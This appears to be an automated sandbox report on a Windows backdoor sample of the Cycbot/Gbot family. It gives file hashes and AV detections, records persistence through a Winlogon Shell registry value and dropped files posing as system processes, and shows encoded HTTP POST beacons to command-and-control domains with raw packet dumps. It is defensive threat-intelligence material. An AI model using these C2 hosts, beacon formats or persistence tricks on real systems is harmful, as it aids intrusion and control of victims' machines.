Analysis Date2014-10-14 23:12:54
MD515466e7117a753a2000b82ef2510bd5d
SHA1c0284ae5c11a55d92f32ef56df571d77f71b3de6

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 197c664c242c9487be9a0563033e5928 sha1: 68c98a0e8df1fe5453273f58607f938c5c2e789d size: 114176
Section.rdata md5: 2ba0304b74625e398f1b7314f1101250 sha1: 5dc833512eeda856937ebddb494bcae63ecc2804 size: 1024
Section.data md5: 5874b91f36051e09a80e56507bb1dd82 sha1: 7b970ce1f174c5f92eead1a8040adf5a66c9d636 size: 67584
Section.reloc md5: 61855ddf54cf51c3bcec796b4cc9c03e sha1: cf8d84064a094dd874f82213c7a244ff4a9b4195 size: 1024
Timestamp2005-09-08 05:27:52
PEhash060dce1ca58d4bbb59c23bdcdbea9243a3c1ef16
IMPhash86cd54e0928f0b248eaee37df747979a
AV360 SafeGen:Heur.Conjar.5
AVAd-AwareGen:Heur.Conjar.5
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVBullGuardGen:Heur.Conjar.5
AVCA (E-Trust Ino)Win32/Cycbot.G!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-449
AVDr. WebBackDoor.Gbot - infected, incurable
AVEmsisoftGen:Heur.Conjar.5
AVEset (nod32)Win32/Kryptik.THG
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureRogue:W32/OpenCloud.A
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.ogk
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.n
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVNormanwinpe/Cycbot.EC
AVRisingBackdoor.Win32.Cycbot.a
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen7
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)SScope.Malware-Cryptor.Maxplus.0997
AVYara APTno_virus
AVZillya!Backdoor.Gbot.Win32.3606

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex{45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS127.0.0.1
Winsock DNSyourmediaresources.com
Winsock DNSlostpropaganda.net

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSlostpropaganda.net
Type: A
DNSyourmediaresources.com
Type: A
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384f6f 59764561 53505425   ij%2B8OoYvEaSPT%
0x000000c0 (00192)   32427371 74537225 32466525 32425635   2BsqtSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 4238796a 59764561 53765425   ij%2B8yjYvEaSvT%
0x000000c0 (00192)   32427371 74537225 32466525 32425635   2BsqtSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42387976 55712532 4633766c   ij%2B8yvUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6564672e   1..Host: zonedg.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   206d6f7a 696c6c61 2f322e30 0d0a436f    mozilla/2.0..Co
0x00000100 (00256)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x00000110 (00272)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000120 (00288)   73650d0a 0d0a                         se....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42383275 59764561 53765425   ij%2B82uYvEaSvT%
0x000000c0 (00192)   32427371 70537225 32466525 32425635   2BsqpSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 4238796a 59764561 53505425   ij%2B8yjYvEaSPT%
0x000000c0 (00192)   32427371 74537225 32466525 32425635   2BsqtSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a 605291              lose....`R.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384f6f 59764561 53505425   ij%2B8OoYvEaSPT%
0x000000c0 (00192)   32427371 6c537225 32466525 32425635   2BsqlSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....


Strings
...<.]
_.
@#
`w
..
.
[
_
.
.

080904b0
1.0.0.1
1915
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
``$@@"
^^^^^^^^
~~~~~~
<<<<<<<
<____________
||||||||||||
_~~~~~
_____________
-----------
--------------------------
,																	
;;;;;;
;;;;;;;;;;;;;;;;;;;;&&&&&&&
::::::
!!!!!!!!!!!!!!!!!!!!!!
//////
////////
''''''''
""""""
"""""""
)))))))))))))
)))))))))))))))))
{{{{{{{{{{{
{{{{{{\\\\
@`,@`.@
%%%%%'
%%%%%%%%
+,  ++
+++++++++
+++++++++++
						
							
															%
																	
000000
00000000000
000RRR
@ 0coF
_0M88NvS!`
0N']e`
` <-0YH
16<YmF
1H5#-'`
]%1}mg
1o`[T>
2222222oOOO(((((
 2&@`j
2XXXXXXX
`2~YR[5.A
^38Sg9
3a^h/Gk
3BBBBBBBBBBBBBB
3bE==?
)3IXi[
3mL]jI
"`3OFZ
^3~xKp
3y>}PW
4444444
44444444444nn
47G8j'
_4fq&Me
 !4\( `MO
4oeNwW
4]t&``
4Z)Ap @ 
51oY5H
55555555
55555555555555555CCCCCC
55555555PPPPPPPPPPPPPPPP
5555cccccc
5555ooooooooooooooooo
""""55WWWWW
5<9Ked|
5.e1W4
5)\R`:
5t*>D]c8
5Yc?CD
5Y|wlFW&
666666
^6~-B"
6boAql
>[7&` 	{K
7,@@V<
8^+%4.
;<8fiU5
8FY[_[
+8JVz1Gd
` 8ug.@
999999
aaaaaaaa
aaaaaaaaaPP
aaaaaaajj
a&&jjjjjj
al-67lT
;aln$`
a;t,A`
atbz" 
.@ 	b`
B(((((
B	A0${
bACn*O
BBBBBB
bbbbbbbb
bbbbbjjjjD//////
bi:P\:
Bj9dqwkR
bm4D~}
bPJhk=q{
<`br[q
@@bt{q
bY:N11
`B @ Z
$ `\C\
cccccc
cccccccccccccccccccccciiiiiii
CCCCzzzzzzzzzz
!cEwz|
Cf[f3[p
CfnwZm
 C'fvn
  cJk 
C|KGuo
cl{bh-
=c#Pf%
cTL#r!r%
@ctw^xq
@.data
d.D46w
ddddddd
DH_>`6
dHe5T[
DuplicateHandle
?'^dZ{y.
e75PGD
Ea#Mb%__
`,@@E=b>
eeeeeeee
EEEEEEEEE
e`]ezsj0
`E,@`^N
EnumResourceNamesW
E!;p!8e
e&qf,j
  @EvASV
@`f.@ 
fa|o` p
,@@f[c
ffffff
FFz~K)9P
,FgjW'
Fhk!\GB
FindClose
FindFirstFileA
FindResourceExA
FKi2.@
FlushInstructionCache
frb"` 
@ FskJHE
fxn=WW
[[[[    g
g%%%%%%%%%%%
g"0RCk
G3{xF`
GetModuleFileNameW
'''''GGGG
GGGGGGG
ggggggggggg
GmU $qQ
%=:\G}s
gSdEZ7(
g:^SEz
;gy>R4T
H .3x@
h<4.?3
	hB)N8x
HEIJ,Ak
!~hEmb
hhhhhh
HHHHHHH
##hhhhhhhh
|&@@hk
h	){LW
h+#t>Y
"_+hu%
i7/pcr
IigHIF[
iiiiiii
iiiiiiii
IIIIIIIIII
IIIIIIIIIIIIIIFF
IIMYh1
#IL_hS
Im5KJK"Q
I{ZTi"
 `j&@ 
+++++++++j
^J67M&
j8MVY~
+jb1ANz
?Jf1Hb+;
@`>jhv
]]]]]]]]jjj
JJJJGGGGGGGGGGGGGG
jjjjjjjj
\jk4v_G
@JMLa'Dp
  JmX>V
*` JS$@@H
J%uh="i
@JZsu3
 `k-. @
						k
K6A7=k3g
KERNEL32.dll
Kg`N"X
kh.`Os^
~~~~KKK
kkkkkkk
kkkkkkkkkk
KKKKKKKKKK
KKKKKKmMMMMMMMMMhhhhhhhhhh
KKKKKKS
kkkku|
___KKXXXXXXXXXXXXXXXXXKKKK
Kn"MeG
KPm!h!
((((k^^^^^^^^^qqqqqqq
K|rXH{
KS	}GJ-
kYfJG5d
Ld<:L`'
lE']mE^
llllleeee
LLLLVVVV
LoIo38
LT+)in
}lv<7t
L, `vE
lVxghV
 L^/&~w_xaD
LZqX4Y
m6 ` C
=m~,aK
MapViewOfFile
M}Fpu;
m\KB@K
mlp'DBEm;
__MMMMM
mmmmmmmmmmmm;;;;
MOc;QT
<M#Qwm
mYNo~r:
||||||n
@`n4Wp
 `N<5'
N6*	<l
NdrComplexArrayFree
nnnnnn
NNNNNNNNNNNvv
<O\?"@
#;]o9=
O\admuA
@@!oCg[
*\oexU
@Ok%]U
\Om?Aj
On"  #
OOOOOOO33333333y
OOOOOOOOOO
(O'O/z"k
Oq+]w\
[Ox?0?
PathAppendW
PathCombineW
PathFileExistsW
PathRemoveFileSpecW
"@@)pb*
pFgny>
_>PfXC
{>pG5L
pL|IQ=
-P|N[a
pot~!q&
ppp;;;
PPPPPPPPPP
p( `SAU
PU!<[z1
`PWF}m
pxX,}Lwz[
` `@[Q
\\\\\\\\\Q
qaEHaL
_=	qF@
Qg%=8`k
"  QG'U
#qh3u(u@
}@Qo=3
!  @~Qp}
^^^^QQQQNNkkkkkk
qqqqqq
QQQQQQQQQQQQ-
QQQQQQQQQQQUUUUUUUUUU8
qQsWUk
QR/6af
R61{3)
R"@ 9B4j
/rbwrrI-K
 `RCi%4B
`.rdata
.reloc
R,N_%Z
RPCRT4.dll
	r<P)N
RRRRRRR
rrrrrrrrrrrrr
<R{u/X
@R/=v>
RVGoxu
/r=wv!
=RxN|K
S>CWy`6<
SetLocaleInfoW
SHELL32.dll
Shell_NotifyIconA
SHGetValueW
SHLWAPI.dll
Skta" 
sKXT{7=
#SM(yA}
sN\KxM[
  Snpy
SS!Kdd
SSSSSS
)))))'''''''SSSSSSS
ssssssss
ssssssssss
 >sW$@
= @ \t
?T;,@@?
T3Fhu4
TgVN\'
!This program cannot be run in DOS mode.
timeEndPeriod
t*LJ/1,
tp2a%4
TQ3c#b]
TTTTTT
(U7%G1/y
'u,*K#
ummm|||||
UnmapViewOfFile
U%plX5
URa /H
uRk=,@
u.`@?s
UuidCreate
UUUUUUU
uuuuuuuu
v_____
v6I6`Y
va4r~X
va#hjC
vOcm38gV
Vqy[T|
VV					
VVVVVVV
vvvvvvvv@@@
vvvvvvvvv
VVVVVVVVVmm
VW4*q>
vZ(@ #u
W/8L1I
&"W>iZ
W{/MiX
`wO%[/[
w,,@Oo
W&"p3*
\\\WWW
WWWW~~
wwwwww
WWWWx     
X\_$` 
X";=1aX
XC/\rJ
 xg<aW
XHB\, 
xn_'Bs
xOt@Ge0
XxW*``
XXXX[[[[
xxxxxxxxx
,_&;++y2
Y3`LXB
y3R	{bA&
;Y9IwKP
Yc{t!Z_j
_+Yd^@p-$[
Ye>9s'k
YEEarJ
~yL]W^3
YM0&2d
"ymD'A
Yw<`Vnv@AJ
'yxG:T
yyyyyy
????''''''''z
z0QZ+j
Z44H-,+
;::Z:C
ZIhd]A
ZY*2'-
ZZWWWCCCCCCTT//
zzzzllllllllllllgg
ZZZZZZZZZ
ZZZZZZZZZZ